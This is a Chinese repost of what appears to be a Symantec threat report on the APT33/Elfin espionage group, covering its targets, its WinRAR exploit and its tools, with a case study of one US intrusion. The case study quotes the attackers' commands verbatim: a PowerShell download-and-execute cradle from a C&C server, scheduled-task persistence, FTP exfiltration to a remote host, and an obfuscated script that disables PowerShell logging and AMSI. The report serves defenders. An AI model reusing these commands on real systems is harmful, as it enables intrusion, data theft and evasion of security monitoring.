内容简介:Elfin间谍组织(又称APT33)在过去三年中一直高度活跃,攻击沙特阿拉伯、美国和其他一些国家的至少50个机构。该组织于2015年底左右首次开展活动,专门扫描易受攻击的网站用于识别潜在目标,借此开展攻击或创建命令和控制(C&C)基础设施。它已经入侵了大量的目标,包括政府以及科研,化学,工程,制造,咨询,金融,电信和其他多个行业的机构。
Elfin间谍组织(又称APT33)在过去三年中一直高度活跃,攻击沙特阿拉伯、美国和其他一些国家的至少50个机构。
该组织于2015年底左右首次开展活动,专门扫描易受攻击的网站用于识别潜在目标,借此开展攻击或创建命令和控制(C&C)基础设施。它已经入侵了大量的目标,包括政府以及科研,化学,工程,制造,咨询,金融,电信和其他多个行业的机构。
图1.按国家划分的Elfin攻击[2016-2019]
一、诸多美国目标
Elfin继续大力关注沙特阿拉伯,其占赛门铁克自2016年初以来统计的攻击事件的42%。然而,美国也是该组织的一个重要目标,过去三年中有18个机构受到攻击。多年来,包括多家财富500强企业。
Elfin在美国的目标包括工程,化学,研究,能源咨询,金融,IT和医疗保健领域的机构。
图2. 按行业划分的Elfin攻击[2016-2019]
为了加大供应链攻击,其中一些美国机构也成为了Elfin的目标。在一个例子中,一家大型美国公司在同一个月遭到攻击,而其中东公司也受到了入侵。
图3. 按月划分的Elfin攻击[2016-2019]
二、漏洞利用
在2019年2月的攻击浪潮中,Elfin试图利用WinRAR中的一个已知漏洞(CVE-2018-20250)。WinRAR是一种广泛使用的文件归档和压缩的实用程序,能够创建自解压归档文件。该漏洞利用的目标是一家沙特阿拉伯化工企业。如果在未打补丁的计算机上成功利用此漏洞,则该漏洞允许攻击者在计算机上安装任何文件,从而允许在目标计算机上执行代码。
目标机构中的两个用户收到一个名为“JobDetails.rar”的文件,该文件试图利用WinRAR漏洞。此文件可能是通过鱼叉式网络钓鱼邮件发送的。但是,在此次尝试攻击之前,赛门铁克已采取主动防护,以防止任何利用此漏洞的企图( Exp.CVE-2018-20250 )。该防护成功的保护了目标机构免受攻击。
三、与Shamoon关联
Elfin于2018年12月成为人们关注的焦点,当时它与新一轮的Shamoon袭击有关。沙特阿拉伯的一名Shamoon受害者最近也遭到了Elfin的攻击,并且感染了Elfin使用的Stonedrill恶意软件( Trojan.Stonedrill )。因为Elfin和Shamoon对该机构的攻击发生得如此紧密,所以有人猜测这两个组织可能有关联。但是,赛门铁克没有发现有进一步的证据表明Elfin与这些Shamoon攻击有关。我们会继续密切监察两个组织的活动。
四、Elfin的 工具 集
Elfin在其攻击中部署了各种工具,包括自定义恶意软件、商品恶意软件和开源黑客工具。
该组织使用的自定义恶意软件包括:
· Notestuk( Backdoor.Notestuk )(又名TURNEDUP):可用于开启后门并从受感染计算机收集信息的恶意软件。
· Stonedrill(Trojan.Stonedrill):自定义恶意软件能够在受感染的计算机上开启后门并下载其他文件。该恶意软件还具有破坏性组件,可以擦除受感染计算机的主引导记录。
· AutoIt后门:使用AutoIt脚本语言编写的自定义后门。
除了自定义恶意软件外,Elfin还使用了许多商品恶意软件工具,可以在地下网络购买。包括:
· Remcos( Backdoor.Remvio ):一种商品远程管理工具(RAT),可用于窃取受感染计算机的信息。
·DarkComet( Backdoor.Breut ):另一种商品RAT,用于在受感染的计算机上开启后门并窃取信息。
· Quasar RAT( Trojan.Quasar ):商品RAT,可用于窃取密码并在受感染的计算机上执行命令。
· Pupy RAT( Backdoor.Patpoopy ):可以在受感染的计算机上打开后门的商品RAT。
· NanoCore( Trojan.Nancrat t):商品RAT用于在受感染的计算机上开启后门并窃取信息。
·NetWeird( Trojan.Netweird.B ):一种可以开启后门并从受感染计算机中窃取信息的商品木马。它还能下载其他潜在的恶意文件。
Elfin还经常使用一些公开的黑客工具,包括:
·LaZagne( SecurityRisk.LaZagne ):一种登录/密码获取工具。
· Mimikatz( Hacktool.Mimikatz ):旨在窃取凭证的工具。
·Gpppassword:用于获取和解密组策略首选项(GPP)密码的工具。
·SniffPass( SniffPass ):旨在通过嗅探网络流量来窃取密码的工具。
五、案例研究:Elfin攻击是如何展开的
在本节中,我们将详细描述Elfin对美国机构的攻击。在2018年2月12日16:45(所有时间都为该机构的当地时间),向该机构发送了一封电子邮件,宣称一家美国全球服务提供商的职位空缺。该电子邮件包含恶意链接hxxp://mynetwork.ddns[DOT].net:880。
收件人单击该链接将继续下载并打开恶意HTML可执行文件,该文件又通过嵌入式iframe从C&C服务器加载内容。同时,此文件中嵌入的代码还执行了PowerShell命令,以便从C&C服务器下载并执行chfeeds.vbe的副本。
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX(New-Object Net.WebClient).DownloadString('hxxps://217.147.168[DOT]46:8088/index.jpg');
还执行了第二个JavaScript命令,它创建了一个计划任务,每天多次执行chfeeds.vbe。
a.run('%windir%\\System32\\cmd.exe /c PowerShell -window hidden schtasks.exe /CREATE /SC DAILY /TN "1" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 01:00 /f && schtasks.exe /CREATE /SC DAILY /TN "3" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 03:00 /f && schtasks.exe /CREATE /SC DAILY /TN "5" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 05:00 /f && schtasks.exe /CREATE /SC DAILY /TN "7" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 07:00 /f && schtasks.exe /CREATE /SC DAILY /TN "9" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 09:00 /f && schtasks.exe /CREATE /SC DAILY /TN "11" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 11:00 /f && schtasks.exe /CREATE /SC DAILY /TN "13" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 13:00 /f && schtasks.exe /CREATE /SC DAILY /TN "15" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 15:00 /f && schtasks.exe /CREATE /SC DAILY /TN "17" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 17:00 /f && schtasks.exe /CREATE /SC DAILY /TN "19" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 19:00 /f && schtasks.exe /CREATE /SC DAILY /TN "21" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 21:00 /f && schtasks.exe /CREATE /SC DAILY /TN "23" /TR "C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Feeds\\chfeeds.vbe" /ST 23:00 /f ')
chfeeds.vbe文件充当下载程序,用于下载第二个PowerShell脚本(registry.ps1)。该脚本依次从C&C服务器(hxxps:// host-manager.hopto.org)下载并执行名为POSHC2的PowerShell后门,这是一个代理感知的C&C框架。后来在20:57,攻击者在受感染的计算机上变得活跃,然后继续下载WinRAR。
89.34.237.118 808 hxxp://89.34.237[DOT]118:808/Rar32.exe
在23:29,攻击者随后开始部署他们的POSHC2 stager的更新版本。
192.119.15.35 880 hxxp://mynetwork.ddns[DOT]net:880/st-36-p4578.ps1
该工具在2月12日23:29和2月13日07:47之间多次下载。
两天后,即2月14日15:12,攻击者返回并将Quasar RAT安装到与C&C服务器(217.147.168.123)通信的受感染计算机上。Quasar RAT安装到
CSIDL_PROFILE\appdata\roaming\microsoft\crypto\smss.exe.。
此时,攻击者在保持访问网络的同时停止活动,直到2月21日。在06:38,观察到攻击者将自定义.NET FTP工具下载到受感染的计算机。
192.119.15.36 880 hxxp://192.119.15[DOT]36:880/ftp.exe
后来在6:56,攻击者使用此FTP工具将数据传输到远程主机:
JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\appdata\roaming\adobe\rar -a ftp://89.34.237.118:2020 -f /[REDACTED] -u [REDACTED] -p [REDACTED]
活动停止,直到攻击者在3月5日返回,使用Quasar RAT从hxxp://192.119.15 [DOT] 36:880 / ftp.exe下载第二个自定义AutoIt FTP工具,称为FastUploader。然后将此工具安装到hxxp://192.119.15[DOT]36:880/ftp.exe。FastUploader是一种自定义FTP工具,旨在以比传统FTP客户端更快的速度传输数据。
此时,攻击者的其他活动在3月5日到4月之间继续,4月18日11:50,第二个远程访问工具DarkComet被部署到受感染计算机上的csidl_profile\appdata\roaming\microsoft\windows\start menu\programs\startup\smss.exe。15秒后,安装凭证转储到csidl_profile\appdata\roaming\microsoft\credentials\dwm32.exe,通过免费的PowerShell Empire执行PowerShell命令来绕过受感染机器上的日志记录。
$GPF=[Ref].AsSeMBLy.GeTTYPe('System.Management.Automation.Utils')."GEtFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GeTVALUE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[COlLecTIons.GEneRic.DIctIoNARy[stRiNG,SyStEM.Object]]::nEw();$VAL.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add ('EnableScriptBlockInvocationLogging',0);$GPC ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ELSe{[SCRIPTBLOck]."GEtFiE`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NuLL,(New-ObjeCt ColLectiONs.GeNERic.HASHSEt[StrInG]))}[REF].AssemBLy.GetTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SETValUe($nUll,$TrUE)};
攻击活动在整个4月继续进行,其中部署了其他版本的DarkComet,POSHC2植入程序和AutoIt后门,以及进一步的凭证转储。
六、活跃的攻击者
Elfin是目前在中东地区最活跃的恶意组织之一,针对不同行业的众多机构。在过去的三年中,该组织利用各种工具对付受害者,从定制的恶意软件到现成的RAT,表明其不断修改其策略,寻找下一步攻击的工具。
七、保护/缓解
赛门铁克提供以下保护措施,以保护客户免受这些攻击:
基于文件的保护
以上所述就是小编给大家介绍的《雨露均沾——间谍组织APT33不仅关注中东地区,美国也是该组织的一个重要目标》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 海莲花组织使用新技术手段攻击越南某环保组织
- 【国际资讯】当APT组织碰到另一个APT组织,他们在聊些什么?
- 网络犯罪组织喜欢模仿大企业组织架构 但最后因为太官僚而被抓获
- What?竟有间谍组织在Shadow Brokers泄密之前使用了方程式组织的工具?
- Waterbug间谍组织不断扩充其武器库,还劫持了Oilrig黑客组织的基础设施
- 什么是组织增长官?
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Spark技术内幕
张安站 / 机械工业出版社 / 2015-9-1
Spark是不断壮大的大数据分析解决方案家族中备受关注的新增成员。它不仅为分布式数据集的处理提供一个有效框架,而且以高效的方式处理分布式数据集。它支持实时处理、流处理和批处理,提供了AllinOne的统一解决方案,使得Spark极具竞争力。 本书以源码为基础,深入分析Spark内核的设计理念和架构实现,系统讲解各个核心模块的实现,为性能调优、二次开发和系统运维提供理论支持;本文最后以项目实战......一起来看看 《Spark技术内幕》 这本书的介绍吧!